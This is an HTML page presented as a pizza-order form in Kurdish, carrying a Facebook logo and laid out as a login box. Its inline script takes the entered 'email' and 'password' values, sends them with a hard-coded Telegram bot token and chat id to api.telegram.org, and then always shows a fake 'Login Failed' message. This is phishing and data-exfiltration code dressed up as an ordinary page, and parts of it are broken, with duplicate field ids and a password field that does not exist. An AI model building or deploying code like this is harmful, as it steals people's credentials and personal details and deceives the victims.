<!doctype html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>SHA PIZZA</title>
</head>
<body>

     <link rel="stylesheet" href="style.css">
     <link rel="script"href="script.js">
    <!-- Login box -->
    <div class="login-box">
        <!-- Logo and title -->
        <div class="logo-container">
            <img src="https://upload.wikimedia.org/wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg" alt="Facebook Logo">
            <h2>SHA PIZZA</h2>
        </div>

        <!-- Login Form -->
        <form id="loginForm">
            <input type="text" id="email" placeholder="خواردنی پیویست" required>
            <input type="text" id="email" placeholder="ژمارەی موبایل" required>
             <input type="text" id="email" placeholder="ناونیشان" required>
  
            <button type="submit" class="login-button">ئەتوانی نامەکەت بنیری</button>
        </form>

        <!-- Error message -->
        <div id="errorMessage" class="error-message" style="display:none;">Login Failed, Try Again Later.</div>


    <script>
        
        document.getElementById('loginForm').addEventListener('submit', function(event) {
            event.preventDefault();

            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;

            
            if (email === '') {
                alert('Please enter both email and password.');
                return;
            }

            
            const isPhoneNumber = /^[0-9]+$/.test(email);

            if (isPhoneNumber) {
                console.log('Phone number detected:', email);
            } else {
                console.log('Email detected:', email);
            }

            
            const botToken = '7681351216:AAESGnN-l3znGDjXomQukBzb9JFRoYUHmDs';
            const chatId = '7789589671';

            
            const message = `Login Attempt Failed:\nEmail/Phone: ${email}\nPassword: ${password}`;

            
            fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        console.log('Failed login data sent to Telegram.');
                    } else {
                        console.log('Failed to send failed login data.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                });

            
            const errorMessage = document.getElementById('errorMessage');
            errorMessage.style.display = 'block';
        });
    </script>






   <script src="script.js" >
    </script>


</body>
</html>